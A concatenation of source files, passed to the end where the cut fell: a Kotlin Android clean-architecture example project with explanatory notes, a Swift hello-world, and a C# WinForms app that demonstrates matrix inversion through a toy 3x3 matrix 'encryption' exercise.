.fallbackToDestructiveMigration()
.build()
}
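`DatabaseClient` above uses the classic `@Volatile` field plus double-checked locking idiom so the expensive `buildDatabase` call runs at most once even when several threads race on `getInstance`. A Room-free sketch of the same idiom (`Expensive` and `buildCount` are illustrative; the counter exists only to make the single-construction guarantee observable):

```kotlin
import java.util.concurrent.atomic.AtomicInteger

// Stand-in for an expensive-to-build object such as a Room database.
class Expensive private constructor() {
    init { buildCount.incrementAndGet() }

    companion object {
        val buildCount = AtomicInteger(0)

        @Volatile
        private var INSTANCE: Expensive? = null

        // First null-check avoids locking on the hot path; the second check
        // inside the lock guards against two threads passing the first check
        // at the same time.
        fun getInstance(): Expensive =
            INSTANCE ?: synchronized(this) {
                INSTANCE ?: Expensive().also { INSTANCE = it }
            }
    }
}
```

Without `@Volatile`, a thread could observe a partially published `INSTANCE`; without the second check, two threads that both saw `null` would each build an instance.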
<file_sep>package com.example.template.remote.model
import com.example.template.model.User
internal data class UserDto(
val address: AddressDto,
val company: CompanyDto,
val email: String,
val id: Int,
val name: String,
val phone: String,
val username: String,
val website: String
)
internal fun UserDto.toUser() = User(
id,
address.toAddress(),
company.toCompany(),
email,
name,
phone,
username,
website
)
internal fun List<UserDto>.toUsers() = map { it.toUser() }<file_sep>package com.example.template.tools.binding_adapter
import androidx.databinding.BindingAdapter
import androidx.recyclerview.widget.ListAdapter
import androidx.recyclerview.widget.RecyclerView
@BindingAdapter("data")
fun RecyclerView.data(items: List<Nothing>?) {
items ?: return
(adapter as? ListAdapter<*, *>)?.submitList(items)
}<file_sep>package com.example.template.model
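The `List<Nothing>?` parameter in the binding adapter above looks odd but is deliberate: on a star-projected `ListAdapter<*, *>`, the item type appears in an `in` position, so `submitList` statically accepts only `List<Nothing>`. A pure-Kotlin sketch of the same variance situation, with `Submitter` as an illustrative stand-in for `ListAdapter` and an explicit unchecked cast where data binding would otherwise hide it:

```kotlin
// Illustrative stand-in for ListAdapter<T, VH>: T occurs in an `in` position.
open class Submitter<T> {
    private val items = mutableListOf<T>()
    fun submitList(list: List<T>) { items.clear(); items.addAll(list) }
    val size get() = items.size
}

// Under a star projection the in-position T collapses to Nothing, so the only
// list a Submitter<*> will statically accept is List<Nothing>. The unchecked
// cast bridges untyped callers (e.g. data binding) to that signature; it is
// safe at runtime because generics are erased.
@Suppress("UNCHECKED_CAST")
fun bindData(target: Any?, items: List<Any?>?) {
    items ?: return
    (target as? Submitter<*>)?.submitList(items as List<Nothing>)
}
```

This is the same trick the adapter uses: the type system is deliberately side-stepped at one well-marked point so a single binding adapter can feed any item type.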
import com.example.template.cache.model.CompanyEntity
data class Company(
val bs: String,
val catchPhrase: String,
val name: String
)
internal fun Company.toCompanyEntity() = CompanyEntity(
bs,
catchPhrase,
name
)<file_sep>package com.example.template.cache.model
import androidx.room.ColumnInfo
import androidx.room.Embedded
import androidx.room.Entity
import androidx.room.PrimaryKey
import com.example.template.cache.tools.BaseEntityItem
import com.example.template.model.User
@Entity(tableName = UserEntity.TABLE_NAME)
internal data class UserEntity(
@PrimaryKey
@ColumnInfo(name = COLUMN_ID)
override val id: Long,
@Embedded
val address: AddressEntity,
@Embedded(prefix = COMPANY_PREFIX)
val company: CompanyEntity,
val email: String,
val name: String,
val phone: String,
val username: String,
val website: String
): BaseEntityItem {
companion object {
const val TABLE_NAME = "table_user"
const val COLUMN_ID = "user_id"
const val COMPANY_PREFIX = "company_"
}
}
internal fun UserEntity.toUser() = User(
id.toInt(),
address.toAddress(),
company.toCompany(),
email,
name,
phone,
username,
website
)
internal fun List<UserEntity>.toUsers() = map { it.toUser() }<file_sep>import Libraries.AndroidX
import java.io.FileInputStream
import java.util.*
plugins {
id(BuildPlugins.androidApplication)
id(BuildPlugins.kotlinAndroid)
id(BuildPlugins.kotlinAndroidExtensions)
id(BuildPlugins.kotlinKapt)
id(BuildPlugins.safeArgsPlugin)
}
android {
compileSdkVersion(AndroidSdk.compile)
buildToolsVersion(BuildPlugins.buildToolsVersion)
defaultConfig {
applicationId = "com.example.template"
minSdkVersion(AndroidSdk.min)
targetSdkVersion(AndroidSdk.target)
versionCode = 1
versionName = "1.0"
testInstrumentationRunner = "androidx.test.runner.AndroidJUnitRunner"
dataBinding.isEnabled = true
}
sourceSets {
getByName("main").res.srcDirs(
"src/main/res",
"src/main/res/layouts/user",
"src/main/res/layouts/post"
)
}
signingConfigs {
val keystorePropertiesFile = rootProject.file("app/cert/keystore.properties")
val keystoreProperties = Properties()
keystoreProperties.load(FileInputStream(keystorePropertiesFile))
create("release") {
keyAlias = keystoreProperties["keyAlias"].toString()
keyPassword = keystoreProperties["keyPassword"].toString()
storeFile = file(keystoreProperties["storeFile"].toString())
storePassword = keystoreProperties["storePassword"].toString()
}
getByName("debug") {
storeFile = rootProject.file("app/cert/debug-key.jks")
storePassword = "<PASSWORD>"
keyAlias = "test123"
keyPassword = "<PASSWORD>"
}
}
buildTypes {
getByName("debug") {
signingConfig = signingConfigs.getByName("debug")
}
getByName("release") {
isMinifyEnabled = true
signingConfig = signingConfigs.getByName("release")
proguardFiles(
getDefaultProguardFile("proguard-android-optimize.txt"),
"proguard-rules.pro"
)
}
}
}
dependencies {
implementation(project(":domain"))
implementation(project(":data"))
implementation(AndroidX.appCompat)
implementation(AndroidX.ktxCore)
implementation(AndroidX.constraintLayout)
implementation(AndroidX.recyclerView)
implementation(AndroidX.lifecycleViewmodel)
implementation(Libraries.kotlinStdLib)
implementation(Libraries.material)
implementation(Libraries.timber)
implementation(Libraries.navigationUI)
implementation(Libraries.navigationFragment)
implementation(Libraries.koin)
implementation(Libraries.koinViewmodel)
testImplementation(TestLibraries.junit4)
androidTestImplementation(TestLibraries.junitTestExt)
androidTestImplementation(TestLibraries.espresso)
}<file_sep>package com.example.template.remote.model
import com.example.template.model.Geo
internal data class GeoDto(
val lat: String,
val lng: String
)
internal fun GeoDto.toGeo() = Geo(
lat,
lng
)<file_sep>package com.example.template.tools
interface BaseItem {
val id: Int
}<file_sep>package com.example.template.remote.user
import com.example.template.remote.model.PostDto
import com.example.template.remote.model.UserDto
import retrofit2.Response
internal interface UserService {
suspend fun getPosts(userId: Int): Response<List<PostDto>>
suspend fun getUsers(): Response<List<UserDto>>
}
internal class UserServiceImpl(private val userInterface: UserInterface) :
UserService {
override suspend fun getPosts(userId: Int) = userInterface.getPosts(userId)
override suspend fun getUsers() = userInterface.getUsers()
}
internal class UserMockServiceImpl : UserService {
override suspend fun getPosts(userId: Int): Response<List<PostDto>> =
Response.success(listOf(PostDto("body", 0, "title", 0)))
override suspend fun getUsers(): Response<List<UserDto>> =
Response.success(emptyList())
}<file_sep>package com.example.template.cache.tools
internal interface BaseEntityItem {
val id: Long
}<file_sep># Android Example Project
Example code with use of Clean Architecture and popular libraries like Retrofit, DataBinding, LiveData, Coroutines etc.<file_sep>package com.example.template.tools.base
interface ItemClickListener<T> {
fun onItemClicked(item: T)
}<file_sep>package com.example.template.remote
import com.example.template.remote.user.UserInterface
import okhttp3.OkHttpClient
internal object ApiUtils {
private const val URL_TO_API = "https://jsonplaceholder.typicode.com"
fun getUserInterface(okHttpClient: OkHttpClient): UserInterface =
Retrofit.getClient(okHttpClient, URL_TO_API)
.create(UserInterface::class.java)
}<file_sep>package com.example.template.posts
import androidx.databinding.ViewDataBinding
import androidx.databinding.library.baseAdapters.BR
import com.example.template.R
import com.example.template.model.Post
import com.example.template.tools.base.BaseAdapter
class PostAdapter: BaseAdapter<Post>() {
override fun getLayout() = R.layout.item_post
override fun bindingData(binding: ViewDataBinding, item: Post) {
binding.setVariable(BR.Post, item)
binding.executePendingBindings()
}
}<file_sep>package com.example.template.tools.base
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.annotation.LayoutRes
import androidx.databinding.DataBindingUtil
import androidx.databinding.ViewDataBinding
import androidx.fragment.app.Fragment
abstract class BaseBindableFragment<T : ViewDataBinding> : Fragment() {
private lateinit var mBinding: T
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View? {
mBinding = DataBindingUtil.inflate(inflater, getLayout(), container, false)
mBinding.lifecycleOwner = this
return mBinding.root
}
@LayoutRes
abstract fun getLayout(): Int
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
bindingData(mBinding)
}
abstract fun bindingData(mBinding: T)
}<file_sep>package com.example.template
import com.example.template.di.DomainKoinComponent
import com.example.template.useCases.PostUseCase
import com.example.template.useCases.UserUseCase
import org.koin.core.inject
object DomainFactory : DomainKoinComponent() {
val userUseCase: UserUseCase by inject()
val postUseCase: PostUseCase by inject()
}
| 416dfd5823052b61be504b57dd265c43e378b0cb | ["Markdown", "Kotlin"] | 64 | Kotlin | krzysztofkurowski/Android-Example-Project | 505ba8a2a6dac5766da71a3f5005868003276bec | 9e5ac3f740c74835ea35a23b48f88bdf9bf4ba44 | refs/heads/main |
<file_sep>//
// main.swift
// Lesson7
//
// Created by Pauwell on 24.03.2021.
//
import Foundation
print("Hello, World!")
|
747a9fe20d377a769b2b7faab1ff820a83f52a1c
|
[
"Swift"
] | 1 |
Swift
|
Pauwell86/Lesson7
|
a0aa2f8623baa0c12914575b74f9995e25c8beec
|
46d68661f67749fab5d37db53db2c01b53c3a893
|
refs/heads/master
|
<file_sep>using System;
using System.Windows.Forms;
namespace MathSharp
{
public partial class frmPrincipal : Form
{
public frmPrincipal()
{
InitializeComponent();
}
private void btnOrdemDois_Click(object sender, EventArgs e)
{
frmOrdemDois OrdemDois = new frmOrdemDois();
OrdemDois.Show();
this.Hide();
}
private void btnOrdemTres_Click(object sender, EventArgs e)
{
frmOrdemTrês OrdemTres = new frmOrdemTrês();
OrdemTres.Show();
this.Hide();
}
private void frmPrincipal_FormClosed(object sender, FormClosedEventArgs e)
{
Application.Exit();
}
}
}
<file_sep>using System;
using System.Linq;
using System.Windows.Forms;
namespace MathSharp
{
public partial class frmOrdemTrês : Form
{
public frmOrdemTrês()
{
InitializeComponent();
}
public static float[,] Senha_Comum; // PASSWORD MATRIX (entered by the user)
public static float Determinante_Comum; // Determinant of the PASSWORD MATRIX
public static float[,] Senha_Criptografia; // ENCRYPTION MATRIX (auxiliary matrix formed by multiplying the elements of the PASSWORD MATRIX)
public static float[,] Senha_Mestre; // MASTER MATRIX (product of the PASSWORD MATRIX x ENCRYPTION MATRIX)
public static float Determinante_Criptografia; // Determinant of the ENCRYPTION MATRIX
public static float[,] Senha_Transposta; // TRANSPOSE MATRIX (transpose of the ENCRYPTION MATRIX)
public static float[,] Senha_Cofatora; // COFACTOR MATRIX (adjugate matrix built from the elements of the TRANSPOSE MATRIX)
public static float[,] Senha_Inversa; // INVERSE MATRIX (result of multiplying the COFACTOR MATRIX x 1 / ENCRYPTION DETERMINANT)
public static float[,] Senha_Descriptografia; // DECRYPTION MATRIX (product of the MASTER MATRIX x INVERSE MATRIX = PASSWORD MATRIX)
private void frmOrdemTres_FormClosed(object sender, FormClosedEventArgs e)
{
frmPrincipal Principal = new frmPrincipal();
Principal.Show();
this.Hide();
}
private void btnCriptografar_Click(object sender, EventArgs e)
{
try
{
// PASSWORD MATRIX: an order-three matrix whose values must be entered by the user.
// Its only rule is a limit on its elements: positive integers no greater than 9999.
float[,] Senha = { { 0, 0, 0 }, { 0, 0, 0 }, { 0, 0, 0 } };
for (int l = 0; l <= 2; l++)
{
for (int c = 0; c <= 2; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
Senha[l, c] = float.Parse(txtSenha.Text);
}
}
Senha_Comum = Senha;
// Determinant of the PASSWORD MATRIX (if the determinant is 0, by definition its inverse does not exist)
float Det_PC, Det_NC, Det_Comum;
// Left-to-right direction
Det_PC = +(Senha_Comum[0, 0] * Senha_Comum[1, 1] * Senha_Comum[2, 2]) + (Senha_Comum[0, 1] * Senha_Comum[1, 2] * Senha_Comum[2, 0]) + (Senha_Comum[0, 2] * Senha_Comum[1, 0] * Senha_Comum[2, 1]);
// Right-to-left direction
Det_NC = -(Senha_Comum[0, 2] * Senha_Comum[1, 1] * Senha_Comum[2, 0]) - (Senha_Comum[0, 0] * Senha_Comum[1, 2] * Senha_Comum[2, 1]) - (Senha_Comum[0, 1] * Senha_Comum[1, 0] * Senha_Comum[2, 2]);
Det_Comum = Det_PC + Det_NC;
Determinante_Comum = Det_Comum;
if (Determinante_Comum == 0)
{
MessageBox.Show("Não foi possível criptografar a senha.\nA matriz senha tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation); // "Could not encrypt the password: the password matrix has a zero determinant."
Zerar_Tudo();
}
else
{
// ENCRYPTION MATRIX: an auxiliary matrix that will be multiplied by the PASSWORD MATRIX.
// It is formed by multiplying the elements of the PASSWORD MATRIX according to the rule below:
// - [Senha(L0C0) x 73] (73 in decimal = I)
// - [Senha(L0C1) x 70] (70 in decimal = F)
// - [Senha(L0C2) x 72] (72 in decimal = H)
// - [Senha(L1C0) x 84] (84 in decimal = T)
// - [Senha(L1C1) x 65] (65 in decimal = A)
// - [Senha(L1C2) x 68] (68 in decimal = D)
// - [Senha(L2C0) x 83] (83 in decimal = S)
// - [Senha(L2C1) x 1]
// - [Senha(L2C2) x 7]
float[,] Criptografia = { // Column 1 // Column 2 // Column 3
{ Senha_Comum[0,0] * 73 , Senha_Comum[0,1] * 70 , Senha_Comum[0,2] * 72 } , // Row 1
{ Senha_Comum[1,0] * 84 , Senha_Comum[1,1] * 65 , Senha_Comum[1,2] * 68 } , // Row 2
{ Senha_Comum[2,0] * 83 , Senha_Comum[2,1] * 01 , Senha_Comum[2,2] * 07 } // Row 3
};
Senha_Criptografia = Criptografia;
txtSenhaCriptografia.Text = Senha_Criptografia[0, 0].ToString() + " " + Senha_Criptografia[0, 1].ToString() + " " + Senha_Criptografia[0, 2].ToString() +
" " + Senha_Criptografia[1, 0].ToString() + " " + Senha_Criptografia[1, 1].ToString() + " " + Senha_Criptografia[1, 2].ToString() +
" " + Senha_Criptografia[2, 0].ToString() + " " + Senha_Criptografia[2, 1].ToString() + " " + Senha_Criptografia[2, 2].ToString();
// Determinant of the ENCRYPTION MATRIX (if the determinant is 0, by definition its inverse does not exist)
float Det_PM, Det_NM, Det_Criptografia;
// Left-to-right direction
Det_PM = +(Senha_Criptografia[0, 0] * Senha_Criptografia[1, 1] * Senha_Criptografia[2, 2]) + (Senha_Criptografia[0, 1] * Senha_Criptografia[1, 2] * Senha_Criptografia[2, 0]) + (Senha_Criptografia[0, 2] * Senha_Criptografia[1, 0] * Senha_Criptografia[2, 1]);
// Right-to-left direction
Det_NM = -(Senha_Criptografia[0, 2] * Senha_Criptografia[1, 1] * Senha_Criptografia[2, 0]) - (Senha_Criptografia[0, 0] * Senha_Criptografia[1, 2] * Senha_Criptografia[2, 1]) - (Senha_Criptografia[0, 1] * Senha_Criptografia[1, 0] * Senha_Criptografia[2, 2]);
Det_Criptografia = Det_PM + Det_NM;
Determinante_Criptografia = Det_Criptografia;
if (Determinante_Criptografia == 0)
{
MessageBox.Show("Não foi possível criptografar a senha.\nA matriz criptografia tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// MASTER MATRIX: a matrix generated by multiplying the ENCRYPTION MATRIX with the PASSWORD MATRIX.
float[] Elementos =
{
// Row 1
(Senha_Comum[0,0] * Senha_Criptografia[0,0]) + (Senha_Comum[0,1] * Senha_Criptografia[1,0]) + (Senha_Comum[0,2] * Senha_Criptografia[2,0]) , // Column 1
(Senha_Comum[0,0] * Senha_Criptografia[0,1]) + (Senha_Comum[0,1] * Senha_Criptografia[1,1]) + (Senha_Comum[0,2] * Senha_Criptografia[2,1]) , // Column 2
(Senha_Comum[0,0] * Senha_Criptografia[0,2]) + (Senha_Comum[0,1] * Senha_Criptografia[1,2]) + (Senha_Comum[0,2] * Senha_Criptografia[2,2]) , // Column 3
// Row 2
(Senha_Comum[1,0] * Senha_Criptografia[0,0]) + (Senha_Comum[1,1] * Senha_Criptografia[1,0]) + (Senha_Comum[1,2] * Senha_Criptografia[2,0]) , // Column 1
(Senha_Comum[1,0] * Senha_Criptografia[0,1]) + (Senha_Comum[1,1] * Senha_Criptografia[1,1]) + (Senha_Comum[1,2] * Senha_Criptografia[2,1]) , // Column 2
(Senha_Comum[1,0] * Senha_Criptografia[0,2]) + (Senha_Comum[1,1] * Senha_Criptografia[1,2]) + (Senha_Comum[1,2] * Senha_Criptografia[2,2]) , // Column 3
// Row 3
(Senha_Comum[2,0] * Senha_Criptografia[0,0]) + (Senha_Comum[2,1] * Senha_Criptografia[1,0]) + (Senha_Comum[2,2] * Senha_Criptografia[2,0]) , // Column 1
(Senha_Comum[2,0] * Senha_Criptografia[0,1]) + (Senha_Comum[2,1] * Senha_Criptografia[1,1]) + (Senha_Comum[2,2] * Senha_Criptografia[2,1]) , // Column 2
(Senha_Comum[2,0] * Senha_Criptografia[0,2]) + (Senha_Comum[2,1] * Senha_Criptografia[1,2]) + (Senha_Comum[2,2] * Senha_Criptografia[2,2]) // Column 3
};
float[,] Mestre =
{
// Column 1 // Column 2 // Column 3
{ Elementos[0], Elementos[1], Elementos[2] } , // Row 1
{ Elementos[3], Elementos[4], Elementos[5] } , // Row 2
{ Elementos[6], Elementos[7], Elementos[8] } // Row 3
};
Senha_Mestre = Mestre;
txtSenhaMestre.Text = Senha_Mestre[0, 0].ToString() + " " + Senha_Mestre[0, 1].ToString() + " " + Senha_Mestre[0, 2].ToString() +
" " + Senha_Mestre[1, 0].ToString() + " " + Senha_Mestre[1, 1].ToString() + " " + Senha_Mestre[1, 2].ToString() +
" " + Senha_Mestre[2, 0].ToString() + " " + Senha_Mestre[2, 1].ToString() + " " + Senha_Mestre[2, 2].ToString();
// TRANSPOSE MATRIX: the transpose of the ENCRYPTION MATRIX
float[,] Transposta =
{
// Column 1 // Column 2 // Column 3
{ Senha_Criptografia[0,0] , Senha_Criptografia[1,0] , Senha_Criptografia[2,0] } , // Row 1
{ Senha_Criptografia[0,1] , Senha_Criptografia[1,1] , Senha_Criptografia[2,1] } , // Row 2
{ Senha_Criptografia[0,2] , Senha_Criptografia[1,2] , Senha_Criptografia[2,2] } // Row 3
};
Senha_Transposta = Transposta;
txtSenhaTransposta.Text = Senha_Transposta[0, 0].ToString() + " " + Senha_Transposta[0, 1].ToString() + " " + Senha_Transposta[0, 2].ToString() +
" " + Senha_Transposta[1, 0].ToString() + " " + Senha_Transposta[1, 1].ToString() + " " + Senha_Transposta[1, 2].ToString() +
" " + Senha_Transposta[2, 0].ToString() + " " + Senha_Transposta[2, 1].ToString() + " " + Senha_Transposta[2, 2].ToString();
// CLEAR FIELDS: if the remaining fields already contain numbers, they will be cleared
Zerar_Parcial();
btnCofatorar.Enabled = true;
btnCofatorar.Focus();
}
}
}
catch
{
MessageBox.Show("Dados inválidos, favor digitar novamente.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Error);
Zerar_Tudo();
}
}
private void btnCofatorar_Click(object sender, EventArgs e)
{
// COFACTOR MATRIX: the adjugate matrix generated from the cofactors of the TRANSPOSE MATRIX
float[] Determinantes_Cofatora =
{
// Row 1
+ 1 * ((Senha_Transposta[1,1] * Senha_Transposta[2,2]) - (Senha_Transposta[2,1] * Senha_Transposta[1,2])) , // Column 1
- 1 * ((Senha_Transposta[1,0] * Senha_Transposta[2,2]) - (Senha_Transposta[2,0] * Senha_Transposta[1,2])) , // Column 2
+ 1 * ((Senha_Transposta[1,0] * Senha_Transposta[2,1]) - (Senha_Transposta[2,0] * Senha_Transposta[1,1])) , // Column 3
// Row 2
- 1 * ((Senha_Transposta[0,1] * Senha_Transposta[2,2]) - (Senha_Transposta[2,1] * Senha_Transposta[0,2])) , // Column 1
+ 1 * ((Senha_Transposta[0,0] * Senha_Transposta[2,2]) - (Senha_Transposta[2,0] * Senha_Transposta[0,2])) , // Column 2
- 1 * ((Senha_Transposta[0,0] * Senha_Transposta[2,1]) - (Senha_Transposta[2,0] * Senha_Transposta[0,1])) , // Column 3
// Row 3
+ 1 * ((Senha_Transposta[0,1] * Senha_Transposta[1,2]) - (Senha_Transposta[1,1] * Senha_Transposta[0,2])) , // Column 1
- 1 * ((Senha_Transposta[0,0] * Senha_Transposta[1,2]) - (Senha_Transposta[1,0] * Senha_Transposta[0,2])) , // Column 2
+ 1 * ((Senha_Transposta[0,0] * Senha_Transposta[1,1]) - (Senha_Transposta[1,0] * Senha_Transposta[0,1])) , // Column 3
};
float[,] Cofatora =
{
// Column 1 // Column 2 // Column 3
{ Determinantes_Cofatora[0] , Determinantes_Cofatora[1] , Determinantes_Cofatora[2] } , // Row 1
{ Determinantes_Cofatora[3] , Determinantes_Cofatora[4] , Determinantes_Cofatora[5] } , // Row 2
{ Determinantes_Cofatora[6] , Determinantes_Cofatora[7] , Determinantes_Cofatora[8] } // Row 3
};
Senha_Cofatora = Cofatora;
txtSenhaCofatora.Text = Senha_Cofatora[0, 0].ToString() + " " + Senha_Cofatora[0, 1].ToString() + " " + Senha_Cofatora[0, 2].ToString() +
" " + Senha_Cofatora[1, 0].ToString() + " " + Senha_Cofatora[1, 1].ToString() + " " + Senha_Cofatora[1, 2].ToString() +
" " + Senha_Cofatora[2, 0].ToString() + " " + Senha_Cofatora[2, 1].ToString() + " " + Senha_Cofatora[2, 2].ToString();
btnDescriptografar.Enabled = true;
btnDescriptografar.Focus();
}
private void btnDescriptografar_Click(object sender, EventArgs e)
{
// INVERSE MATRIX: the matrix resulting from multiplying the COFACTOR MATRIX x 1 / Det(ENCRYPTION MATRIX)
float[,] Inversa =
{
// Column 1 // Column 2 // Column 3
{ (Senha_Cofatora[0,0] / Determinante_Criptografia) , (Senha_Cofatora[0,1] / Determinante_Criptografia) , (Senha_Cofatora[0,2] / Determinante_Criptografia) } , // Row 1
{ (Senha_Cofatora[1,0] / Determinante_Criptografia) , (Senha_Cofatora[1,1] / Determinante_Criptografia) , (Senha_Cofatora[1,2] / Determinante_Criptografia) } , // Row 2
{ (Senha_Cofatora[2,0] / Determinante_Criptografia) , (Senha_Cofatora[2,1] / Determinante_Criptografia) , (Senha_Cofatora[2,2] / Determinante_Criptografia) } // Row 3
};
Senha_Inversa = Inversa;
txtSenhaInversa.Text = Senha_Inversa[0, 0].ToString() + " " + Senha_Inversa[0, 1].ToString() + " " + Senha_Inversa[0, 2].ToString() +
" " + Senha_Inversa[1, 0].ToString() + " " + Senha_Inversa[1, 1].ToString() + " " + Senha_Inversa[1, 2].ToString() +
" " + Senha_Inversa[2, 0].ToString() + " " + Senha_Inversa[2, 1].ToString() + " " + Senha_Inversa[2, 2].ToString();
// DECRYPTION MATRIX: the product of the MASTER MATRIX and the INVERSE MATRIX, which yields the PASSWORD MATRIX
float[] Elementos =
{
// Row 1
(Senha_Mestre[0,0] * Senha_Inversa[0,0]) + (Senha_Mestre[0,1] * Senha_Inversa[1,0]) + (Senha_Mestre[0,2] * Senha_Inversa[2,0]) , // Column 1
(Senha_Mestre[0,0] * Senha_Inversa[0,1]) + (Senha_Mestre[0,1] * Senha_Inversa[1,1]) + (Senha_Mestre[0,2] * Senha_Inversa[2,1]) , // Column 2
(Senha_Mestre[0,0] * Senha_Inversa[0,2]) + (Senha_Mestre[0,1] * Senha_Inversa[1,2]) + (Senha_Mestre[0,2] * Senha_Inversa[2,2]) , // Column 3
// Row 2
(Senha_Mestre[1,0] * Senha_Inversa[0,0]) + (Senha_Mestre[1,1] * Senha_Inversa[1,0]) + (Senha_Mestre[1,2] * Senha_Inversa[2,0]) , // Column 1
(Senha_Mestre[1,0] * Senha_Inversa[0,1]) + (Senha_Mestre[1,1] * Senha_Inversa[1,1]) + (Senha_Mestre[1,2] * Senha_Inversa[2,1]) , // Column 2
(Senha_Mestre[1,0] * Senha_Inversa[0,2]) + (Senha_Mestre[1,1] * Senha_Inversa[1,2]) + (Senha_Mestre[1,2] * Senha_Inversa[2,2]) , // Column 3
// Row 3
(Senha_Mestre[2,0] * Senha_Inversa[0,0]) + (Senha_Mestre[2,1] * Senha_Inversa[1,0]) + (Senha_Mestre[2,2] * Senha_Inversa[2,0]) , // Column 1
(Senha_Mestre[2,0] * Senha_Inversa[0,1]) + (Senha_Mestre[2,1] * Senha_Inversa[1,1]) + (Senha_Mestre[2,2] * Senha_Inversa[2,1]) , // Column 2
(Senha_Mestre[2,0] * Senha_Inversa[0,2]) + (Senha_Mestre[2,1] * Senha_Inversa[1,2]) + (Senha_Mestre[2,2] * Senha_Inversa[2,2]) // Column 3
};
float[,] Descriptografar =
{
// Column 1 // Column 2 // Column 3
{ Elementos[0], Elementos[1], Elementos[2] }, // Row 1
{ Elementos[3], Elementos[4], Elementos[5] }, // Row 2
{ Elementos[6], Elementos[7], Elementos[8] } // Row 3
};
Senha_Descriptografia = Descriptografar;
txtSenhaDescriptografia.Text = Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[0, 2], 0).ToString() +
" " + Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 2], 0).ToString() +
" " + Math.Round(Senha_Descriptografia[2, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[2, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[2, 2], 0).ToString();
btnZerar.Focus();
}
private void btnZerar_Click(object sender, EventArgs e)
{
Zerar_Tudo();
}
// The routines below perform the system's housekeeping tasks: clearing fields, selecting text, generating random numbers.
// They do not directly affect how the system works; they serve only as an organizational base.
public void Zerar_Tudo()
{
for (int l = 0; l <= 2; l++)
{
for (int c = 0; c <= 2; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Clear();
}
}
Senha_Comum = null;
Senha_Criptografia = null;
Senha_Mestre = null;
Senha_Cofatora = null;
Senha_Transposta = null;
Senha_Inversa = null;
Senha_Descriptografia = null;
txtSenhaMestre.Clear();
txtSenhaCriptografia.Clear();
txtSenhaCofatora.Clear();
txtSenhaTransposta.Clear();
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
btnCofatorar.Enabled = false;
btnDescriptografar.Enabled = false;
txtSenha0x0.Focus();
}
public void Zerar_Parcial()
{
Senha_Cofatora = null;
Senha_Inversa = null;
Senha_Descriptografia = null;
txtSenhaCofatora.Clear();
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
btnCofatorar.Enabled = false;
btnDescriptografar.Enabled = false;
}
private void txtSenha0x0_KeyPress(object sender, KeyPressEventArgs e)
{
Zerar_Parcial();
if (!Char.IsDigit(e.KeyChar) && e.KeyChar != (char)8)
{
e.Handled = true;
}
}
private void txtSenha0x0_Enter(object sender, EventArgs e)
{
txtSenha0x0.SelectAll();
}
private void txtSenha0x1_Enter(object sender, EventArgs e)
{
txtSenha0x1.SelectAll();
}
private void txtSenha0x2_Enter(object sender, EventArgs e)
{
txtSenha0x2.SelectAll();
}
private void txtSenha1x0_Enter(object sender, EventArgs e)
{
txtSenha1x0.SelectAll();
}
private void txtSenha1x1_Enter(object sender, EventArgs e)
{
txtSenha1x1.SelectAll();
}
private void txtSenha1x2_Enter(object sender, EventArgs e)
{
txtSenha1x2.SelectAll();
}
private void txtSenha2x0_Enter(object sender, EventArgs e)
{
txtSenha2x0.SelectAll();
}
private void txtSenha2x1_Enter(object sender, EventArgs e)
{
txtSenha2x1.SelectAll();
}
private void txtSenha2x2_Enter(object sender, EventArgs e)
{
txtSenha2x2.SelectAll();
}
private void txtSenhaMestre_Click(object sender, EventArgs e)
{
if (txtSenhaMestre.Text != "")
{
MessageBox.Show
(
Senha_Mestre[0, 0].ToString() + "\t" + Senha_Mestre[0, 1].ToString() + "\t" + Senha_Mestre[0, 2].ToString() + "\n" +
Senha_Mestre[1, 0].ToString() + "\t" + Senha_Mestre[1, 1].ToString() + "\t" + Senha_Mestre[1, 2].ToString() + "\n" +
Senha_Mestre[2, 0].ToString() + "\t" + Senha_Mestre[2, 1].ToString() + "\t" + Senha_Mestre[2, 2].ToString(), "Senha Mestre"
);
}
}
private void txtSenhaCriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaCriptografia.Text != "")
{
MessageBox.Show
(
Senha_Criptografia[0, 0].ToString() + "\t" + Senha_Criptografia[0, 1].ToString() + "\t" + Senha_Criptografia[0, 2].ToString() + "\n" +
Senha_Criptografia[1, 0].ToString() + "\t" + Senha_Criptografia[1, 1].ToString() + "\t" + Senha_Criptografia[1, 2].ToString() + "\n" +
Senha_Criptografia[2, 0].ToString() + "\t" + Senha_Criptografia[2, 1].ToString() + "\t" + Senha_Criptografia[2, 2].ToString(), "Senha Criptografia"
);
}
}
private void txtMatrizTransposta_Click(object sender, EventArgs e)
{
if (txtSenhaTransposta.Text != "")
{
MessageBox.Show
(
Senha_Transposta[0, 0].ToString() + "\t" + Senha_Transposta[0, 1].ToString() + "\t" + Senha_Transposta[0, 2].ToString() + "\n" +
Senha_Transposta[1, 0].ToString() + "\t" + Senha_Transposta[1, 1].ToString() + "\t" + Senha_Transposta[1, 2].ToString() + "\n" +
Senha_Transposta[2, 0].ToString() + "\t" + Senha_Transposta[2, 1].ToString() + "\t" + Senha_Transposta[2, 2].ToString(), "Senha Transposta"
);
}
}
private void txtSenhaCofatora_Click(object sender, EventArgs e)
{
if (txtSenhaCofatora.Text != "")
{
MessageBox.Show
(
